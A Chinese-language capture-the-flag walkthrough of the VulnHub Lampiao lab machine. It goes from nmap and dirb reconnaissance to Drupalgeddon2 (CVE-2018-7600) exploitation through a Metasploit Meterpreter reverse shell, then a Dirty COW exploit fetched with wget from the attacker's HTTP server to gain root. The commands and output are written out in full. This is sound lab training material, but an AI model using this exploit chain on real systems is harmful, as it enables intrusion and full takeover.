背景概述:
下载地址为:https://www.vulnhub.com/entry/lampiao-1,249/
本次的靶机ip为
192.168.2.230
技术要点:
使用nmap进行活跃主机发现,使用命令nmap -sP 192.168.2.0/24
,扫描结果如下。
└─$ sudo nmap -sP 192.168.2.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-07 11:27 CST
Stats: 0:00:02 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
ARP Ping Scan Timing: About 22.16% done; ETC: 11:27 (0:00:07 remaining)
Stats: 0:00:03 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
ARP Ping Scan Timing: About 100.00% done; ETC: 11:27 (0:00:00 remaining)
Nmap scan report for 192.168.2.2
Host is up (0.21s latency).
MAC Address: EC:3C:BB:AE:B7:45 (Huawei Device)
Nmap scan report for 192.168.2.45
Host is up (0.11s latency).
MAC Address: 42:63:96:C3:0E:82 (Unknown)
……
Nmap scan report for 192.168.2.230
Host is up (0.00033s latency).
MAC Address: 00:0C:29:B8:50:AD (VMware)
根据MAC地址可知靶机的IP地址为192.168.2.230
。
使用nmap进行目标主机开放端口扫描,命令为nmap -p 1-65535 -sS -Pn 192.168.2.230
,扫描得出结果为
└─$ sudo nmap -p 1-65535 -sS -Pn 192.168.2.230
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-07 12:18 CST
Nmap scan report for 192.168.2.230
Host is up (0.00093s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1898/tcp open cymtec-port
MAC Address: 00:0C:29:B8:50:AD (VMware)
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds
根据扫描结果可知,目标主机开放了22、80、1898三个端口。
使用dirb进行目标靶机的目录扫描,分别对80、1898端口进行扫描,发现1898端口存在可能可以利用的目录。
└─$ sudo dirb http://192.168.2.230:1898/ 255 ⨯
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Dec 7 12:44:48 2021
URL_BASE: http://192.168.2.230:1898/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.2.230:1898/ ----
==> DIRECTORY: http://192.168.2.230:1898/includes/
+ http://192.168.2.230:1898/index.php (CODE:200|SIZE:11423)
==> DIRECTORY: http://192.168.2.230:1898/misc/
==> DIRECTORY: http://192.168.2.230:1898/modules/
==> DIRECTORY: http://192.168.2.230:1898/profiles/
+ http://192.168.2.230:1898/robots.txt (CODE:200|SIZE:2189)
==> DIRECTORY: http://192.168.2.230:1898/scripts/
+ http://192.168.2.230:1898/server-status (CODE:403|SIZE:295)
==> DIRECTORY: http://192.168.2.230:1898/sites/
==> DIRECTORY: http://192.168.2.230:1898/themes/
+ http://192.168.2.230:1898/web.config (CODE:200|SIZE:2200)
+ http://192.168.2.230:1898/xmlrpc.php (CODE:200|SIZE:42) ……
-----------------
END_TIME: Tue Dec 7 12:44:56 2021
DOWNLOADED: 4612 - FOUND: 5
可知该站点存在目录有http://192.168.2.230:1898/includes/
、http://192.168.2.230:1898/misc/
、http://192.168.2.230:1898/modules/
、http://192.168.2.230:1898/profiles/
、http://192.168.2.230:1898/profiles/
、DIRECTORY: http://192.168.2.230:1898/scripts/
、http://192.168.2.230:1898/sites/
、http://192.168.2.230:1898/themes/
。
使用御剑WEB指纹识别系统进行站点的指纹识别,添加站点为http://192.168.2.230:1898
进行扫描,得出应用指纹为Drupal(水滴)
。
但是并未获得CMS的版本信息,因此我们可以使用CMSeek
来进行版本信息的探测,使用命令python3 cmseek.py -u 192.168.2.230:1898
,得出Drupal 7
。
使用httprint进行中间件探测,得出目标系统为Apache/2.4.7 (Ubuntu)
。
使用nmap进行目标端口服务版本探测,使用命令nmap -sV -p 1898 192.168.2.230
,从结果可知Apache服务监听1898端口,Apanche版本为Apache httpd 2.4.7 ((Ubuntu))
。
从第三步中可知目标操作系统属于Ubuntu
。
搜集Drupal 7
的相关漏洞信息,发现存在CVE-2018-7600 DRUPAL 7.X 版本代码执行
,尝试使用msf进行攻击。
┌──(rootkali)-[/home/hehao/桌面/CMSeeK]
└─# msfdb run //打开msf
[+] Starting database
=[ metasploit v6.0.45-dev ]
+ -- --=[ 2134 exploits - 1139 auxiliary - 364 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: View all productivity tips with the
tips command
[*] Starting persistent handler(s)...
msf6 > search CVE:2018-7600 //搜索CVE编号为2018-7600的漏洞利用
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/drupal_drupalgeddon2
msf6 > use exploit/unix/webapp/drupal_drupalgeddon2 //使用该漏洞利用
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options //查看选项参数
Module options (exploit/unix/webapp/drupal_drupalgeddon2):
Name Current Setting Required Description
---- --------------- -------- -----------
DUMP_OUTPUT false no Dump payload command output
PHP_FUNC passthru yes PHP function to execute
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path to Drupal install
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.2.253 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (PHP In-Memory)
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.2.230 //设置目标IP
RHOSTS => 192.168.2.230
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RPORT 1898 //设置目标端口
RPORT => 1898
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run //运行,开始攻击
[*] Started reverse TCP handler on 192.168.2.253:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending stage (39282 bytes) to 192.168.2.230
[*] Meterpreter session 1 opened (192.168.2.253:4444 -> 192.168.2.230:54384) at 2021-12-08 16:13:52 +0800
shell
meterpreter > shell //进入shell界面
成功获取到shell!
执行shell获取交互式命令,由于我们获取的shell并不是一个具有完整交互的shell,对于已经安装了python的系统,我们可以使用python提供的pty模块,只需要一行脚本就可以创建一个原生的终端。
在获得shell界面输入命令python -c 'import pty; pty.spawn("/bin/bash")'
。
继续进行信息收集,输入命令uname -a
,得到Linux lampiao 4.4.0-31-generic
,这里使用linux内核版本为4.4.0,因此可以使用脏牛提权。
kali攻击机搜索相应的攻击载荷,并在当前文件夹开启http服务准备攻击载荷的传输。
└─# searchsploit dirty //搜索攻击载荷
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1) | linux/dos/43199.c
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2) | linux/dos/44305.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege E | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalati | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method) | linux/local/40611.c
Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL | android/dos/46941.txt
Quick and Dirty Blog (qdblog) 0.4 - 'categories.php' Local File Inclusion | php/webapps/4603.txt
Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion | php/webapps/3729.txt
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1) | linux/local/46361.py
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2) | linux/local/46362.py
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(rootkali)-[/home/hehao/桌面]
└─# searchsploit -m 40847.cpp //使用-m参数,将40847.cpp文件复制到当前文件夹
Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)
URL: https://www.exploit-db.com/exploits/40847
Path: /usr/share/exploitdb/exploits/linux/local/40847.cpp
File Type: C++ source, ASCII text, with CRLF line terminators
Copied to: /home/hehao/桌面/40847.cpp
┌──(rootkali)-[/home/hehao/桌面]
└─# python3 -m http.server 8888 //在当前目录下开启http服务,准备文件的传输
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
192.168.2.252 - - [08/Dec/2021 16:46:12] "GET /40847.cpp HTTP/1.1" 200 -
在获取到的目标机的Shell界面上,下载远程文件,并执行,获取root账户,并进入根目录,查看flag:
www-data@lampiao:/var/www/html$ wget http://192.168.2.253:8888/40847.cpp //下载远程文件
wget http://192.168.2.253:8888/40847.cpp
--2021-12-08 06:46:11-- http://192.168.2.253:8888/40847.cpp
Connecting to 192.168.2.253:8888... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10531 (10K) [text/x-c++src]
Saving to: '40847.cpp'
100%[======================================>] 10,531 --.-K/s in 0s
2021-12-08 06:46:11 (100 MB/s) - '40847.cpp' saved [10531/10531]
www-data@lampiao:/var/www/html$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil //进行编译生成一个 dcow文件
/proc/sys/vm/dirty_writeback_centisecs
root@lampiao:~# cp /tmp/.ssh_bak /etc/passwd
root@lampiao:~# rm /tmp/.ssh_bak
root@lampiao:~# whoami //查看当前权限
whoami
root
root@lampiao:~# cd /root //进入根目录
cd /root
root@lampiao:~# ls
ls
flag.txt
root@lampiao:~# cat flag.txt //拿到flag
cat flag.txt
9740616875908d91ddcdaa8aea3af366